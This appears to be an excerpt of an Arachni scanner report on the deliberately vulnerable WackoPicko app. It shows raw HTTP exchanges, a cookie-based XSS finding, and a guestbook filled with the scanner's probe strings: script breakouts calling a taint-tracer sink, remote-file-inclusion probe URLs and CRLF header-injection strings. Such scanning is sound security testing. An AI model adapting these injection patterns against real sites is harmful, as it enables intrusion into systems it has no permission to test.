type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </h2> <p> File is O.K. to upload! </p> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> |
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 3.950414 | load |
page
|
|
||
| 1 | 2.996451 | request |
http://192.168.0.26/WackoPicko/ |
|
||
| 2 | 0.337047 | request |
http://192.168.0.26/WackoPicko/css/stylings.php |
|
Raw HTTP request used to retrieve the page.
GET /WackoPicko/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cookie: PHPSESSID=euf2e0jqacaf66gdqmin1nb8k5 Accept-Language: en-CA,*
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:49:48 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1267
Content-Type: text/html
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Welcome to WackoPicko</h2>
<p>
On WackoPicko, you can share all your crazy pics with your friends. <br />
But that's not all, you can also buy the rights to the high quality <br />
version of someone's pictures. WackoPicko is fun for the whole family.
</p>
<h3>New Here?</h3>
<p>
<h4><a href="/WackoPicko/users/register.php">Create an account</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4>
</p>
<p>
<h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4>
</p>
<p>
<h4>Or you can test to see if WackoPicko can handle a file:</h4> <br />
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>');
</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
</div>
<div class="column span-24 first last" id="footer" >
<ul>
<li><a href="/WackoPicko/">Home</a> |</li>
<li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li>
<li><a href="mailto:contact@wackopicko.com">Contact</a> |</li>
<li><a href="/WackoPicko/tos.php">Terms of Service</a></li>
</ul>
</div>
</div>
</body>
</html>
This is the browser-evaluated body, as a result of the listed transitions.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | <html><head><script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login"> <li><a href="/WackoPicko/users/login.php"><span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;"> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Welcome to WackoPicko</h2> <p> On WackoPicko, you can share all your crazy pics with your friends. <br> But that's not all, you can also buy the rights to the high quality <br> version of someone's pictures. WackoPicko is fun for the whole family. </p> <h3>New Here?</h3> <p> </p><h4><a href="/WackoPicko/users/register.php">Create an account</a></h4> <p></p> <p> </p><h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4> <p></p> <p> </p><h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4> <p></p> <p> </p><h4>Or you can test to see if WackoPicko can handle a file:</h4> <br> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>'); </script><form enctype="multipart/form-data" action="/WackoPicko/piccheck.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000">Check this file: <input name="userfile" type="file"> <br>With this name: <input name="name" type="text"> <br> <br><input type="submit" value="Send File"><br> </form> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> <p></p> </div> <div class="column span-24 first last" id="footer"> <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body></html> |
This is the original HTTP response body.
0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 | <script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript --> <script> /* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"PHPSESSID":{"stop_at_first":true,"trace":false},"euf2e0jqacaf66gdqmin1nb8k5":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */ window._arachni_js_namespace = true; /* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */ </script> <!-- Injected by Arachni::Browser::Javascript --> <html> <head> <link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection"> <link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print"> <!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]--> <link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen"> <title>WackoPicko.com</title> </head> <body> <div class="container " style="border: 2px solid #5c95cf;"> <div class="column span-24 first last"> <h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1> </div> <div id="menu"> <div class="column prepend-1 span-14 first"> <ul class="menu"> <li class="current"><a href="/WackoPicko/users/home.php"><span>Home</span></a></li> <li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li> <li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li> <li class=""><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li> </ul> </div> <div class="column prepend-1 span-7 first last"> <ul class="menu top_login" > <li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li> </ul> </div> </div> <div class="column span-24 first last" id="search_bar_blue"> <div class="column prepend-17 span-7 first last" id="search_box"> <form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;"> <input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/> <input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" /> </form> </div> </div> <div class="column prepend-1 span-24 first last"> <h2>Welcome to WackoPicko</h2> <p> On WackoPicko, you can share all your crazy pics with your friends. <br /> But that's not all, you can also buy the rights to the high quality <br /> version of someone's pictures. WackoPicko is fun for the whole family. </p> <h3>New Here?</h3> <p> <h4><a href="/WackoPicko/users/register.php">Create an account</a></h4> </p> <p> <h4><a href="/WackoPicko/users/sample.php?userid=1">Check out a sample user!</a></h4> </p> <p> <h4><a href="/WackoPicko/calendar.php">What is going on today?</a></h4> </p> <p> <h4>Or you can test to see if WackoPicko can handle a file:</h4> <br /> <script> // Injected by Arachni::Browser::Javascript _arachni_js_namespaceTaintTracer.update_tracers(); _arachni_js_namespaceDOMMonitor.update_trackers(); document.write('<form enctype="multipart/form-data" action="/WackoPicko/pic' + 'check' + '.php" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="30000" />Check this file: <input name="userfile" type="file" /> <br />With this name: <input name="name" type="text" /> <br /> <br /><input type="submit" value="Send File" /><br /> </form>'); </script> <script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript --> </p> </div> <div class="column span-24 first last" id="footer" > <ul> <li><a href="/WackoPicko/">Home</a> |</li> <li><a href="/WackoPicko/admin/index.php?page=login">Admin</a> |</li> <li><a href="mailto:contact@wackopicko.com">Contact</a> |</li> <li><a href="/WackoPicko/tos.php">Terms of Service</a></li> </ul> </div> </div> </body> </html> |
cookie
input
PHPSESSID
using
GET
at
http://192.168.0.26/WackoPicko/pictures/search.php?query=&x=38&y=12
pointing to
http://192.168.0.26/WackoPicko/guestbook/
.
| Type | In | Action | Default inputs | Updated inputs |
|---|---|---|---|---|
cookie |
http://192.168.0.26/WackoPicko/pictures/search.php?query=&x=38&y=12 | http://192.168.0.26/WackoPicko/guestbook/ |
|
|
Transitions describe the steps required to restore the state of the page, to the one it had when it was processed by the scanner, as a series of events. In essence, each transition represents a user interaction.
| # | Time | Event | Element | Options | ||
|---|---|---|---|---|---|---|
| 0 | 0.681898 | load |
page
|
|
||
| 1 | 0.108019 | request |
http://192.168.0.26/WackoPicko/guestbook/ |
|
||
| 2 | 0.108113 | request |
http://192.168.0.26/WackoPicko/css/stylings.php |
|
Execution-flow sinks log the successful execution of an injected Javascript payload within the page's Javascript environment. Each sink is a point of payload execution.
| # | Data | |
|---|---|---|
| 0 |
No helper data logged. |
Inspect |
Raw HTTP request used to retrieve the page.
GET /WackoPicko/guestbook/ HTTP/1.1 Host: 192.168.0.26 Accept-Encoding: gzip, deflate User-Agent: Arachni/v1.5.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.8,he;q=0.6 X-Arachni-Scan-Seed: ca890a60d2e09a1de6dc78b0f4d0f8ec Cookie: PHPSESSID='%3Bwindow.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'
Raw HTTP response used as the page basis. (Binary bodies will not be displayed.)
HTTP/1.1 200 OK
Date: Mon, 06 Aug 2018 22:51:03 GMT
Server: Apache/2.2.14 (Ubuntu) mod_mono/2.4.3 PHP/5.3.2-1ubuntu4.30 with Suhosin-Patch proxy_html/3.0.1 mod_python/3.3.1 Python/2.6.5 mod_ssl/2.2.14 OpenSSL/0.9.8k Phusion_Passenger/4.0.38 mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.30
Set-Cookie: PHPSESSID=8hvf3606cb47triol4mac47li3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1606
Content-Type: text/html
<script src="http://javascript.browser.arachni/polyfills.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/taint_tracer.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script src="http://javascript.browser.arachni/dom_monitor.js"></script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
/* arachni_js_namespace_initialize_start */ _arachni_js_namespaceTaintTracer.initialize({"window.top._%s_taint_tracer.log_execution_flow_sink()":{"stop_at_first":false,"trace":true},"PHPSESSID":{"stop_at_first":true,"trace":false},"decslc8vmakk398sqkq9619t72":{"stop_at_first":true,"trace":false}}) /* arachni_js_namespace_initialize_stop */
window._arachni_js_namespace = true;
/* arachni_js_namespace_code_start */ /* arachni_js_namespace_code_stop */
</script> <!-- Injected by Arachni::Browser::Javascript -->
<html>
<head>
<link rel="stylesheet" href="/WackoPicko/css/blueprint/screen.css" type="text/css" media="screen, projection">
<link rel="stylesheet" href="/WackoPicko/css/blueprint/print.css" type="text/css" media="print">
<!--[if IE]><link rel="stylesheet" href="/WackoPicko/css/blueprint/ie.css" type="text/css" media="screen, projection"><![endif]-->
<link rel="stylesheet" href="/WackoPicko/css/stylings.php" type="text/css" media="screen">
<title>WackoPicko.com</title>
</head>
<body>
<div class="container " style="border: 2px solid #5c95cf;">
<div class="column span-24 first last">
<h1 id="title"><a href="/WackoPicko/">WackoPicko.com</a></h1>
</div>
<div id="menu">
<div class="column prepend-1 span-14 first">
<ul class="menu">
<li class=""><a href="/WackoPicko/users/home.php"><span>Home</span></a></li>
<li class=""><a href="/WackoPicko/pictures/upload.php"><span>Upload</span></a></li>
<li class=""><a href="/WackoPicko/pictures/recent.php"><span>Recent</span></a></li>
<li class="current"><a href="/WackoPicko/guestbook.php"><span>Guestbook</span></a></li>
</ul>
</div>
<div class="column prepend-1 span-7 first last">
<ul class="menu top_login" >
<li><a href="/WackoPicko/users/login.php"><Span>Login</span></a></li>
</ul>
</div>
</div>
<div class="column span-24 first last" id="search_bar_blue">
<div class="column prepend-17 span-7 first last" id="search_box">
<form action="/WackoPicko/pictures/search.php" method="get" style="display:inline;">
<input id="query2" name="query" size="15" style="padding: 2px; font-size: 16px; text-decoration:none;border:none;vertical-align:middle;" type="text" value=""/>
<input src="/WackoPicko/images/search_button_white.gif" type="image" style="border: 0pt none ; position: relative; top: 0px;vertical-align:middle;margin-left: 1em;" />
</form>
</div>
</div>
<div class="column prepend-1 span-24 first last">
<h2>Guestbook</h2>
<h4>See what people are saying about us!</h4>
<p class="comment">1</p>
<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"// </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()" </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"// </p>
<p class="comment">1</p>
<p> - by ";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();" </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();' </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'// </p>
<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'//</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()"//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'// </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'</p>
<p> - by arachni_name </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">";window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();"//</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by */;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/* </p>
<p class="comment">',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:'</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by </script><script>window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script> </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ",x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:" </p>
<p class="comment">1</p>
<p> - by ',x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:' </p>
<p class="comment"></script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
<script>
// Injected by Arachni::Browser::Javascript
_arachni_js_namespaceTaintTracer.update_tracers();
_arachni_js_namespaceDOMMonitor.update_trackers();
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</script>
<script type="text/javascript">_arachni_js_namespaceTaintTracer.update_tracers();_arachni_js_namespaceDOMMonitor.update_trackers();</script> <!-- Injected by Arachni::Browser::Javascript -->
</p>
<p> - by arachni_name </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">*/;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*</p>
<p> - by arachni_name </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1</p>
<p> - by ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();// </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by 1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(); </p>
<p class="comment">1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink() </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();'//</p>
<p> - by arachni_name </p>
<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by arachni_namehttp://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by arachni_nametests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
<p> - by tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1;
window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//</p>
<p> - by arachni_name </p>
<p class="comment">';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()'</p>
<p> - by arachni_name </p>
<p class="comment">javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()// </p>
<p class="comment">http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by ';window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()' </p>
<p class="comment">1</p>
<p> - by http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1http://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1</p>
<p> - by _arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name_arachni_trainer_ca890a60d2e09a1de6dc78b0f4d0f8ec </p>
<p class="comment">1</p>
<p> - by
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no </p>
<p class="comment">1
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by arachni_name </p>
<p class="comment">
X-CRLF-Safe-ca890a60d2e09a1de6dc78b0f4d0f8ec: no</p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt</p>
<p> - by arachni_name </p>
<p class="comment">hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p> - by arachni_name </p>
<p class="comment">1</p>
<p> - by hTtP://tests.arachni-scanner.com/rfi.md5.txt </p>
<p class="comment">1</p>
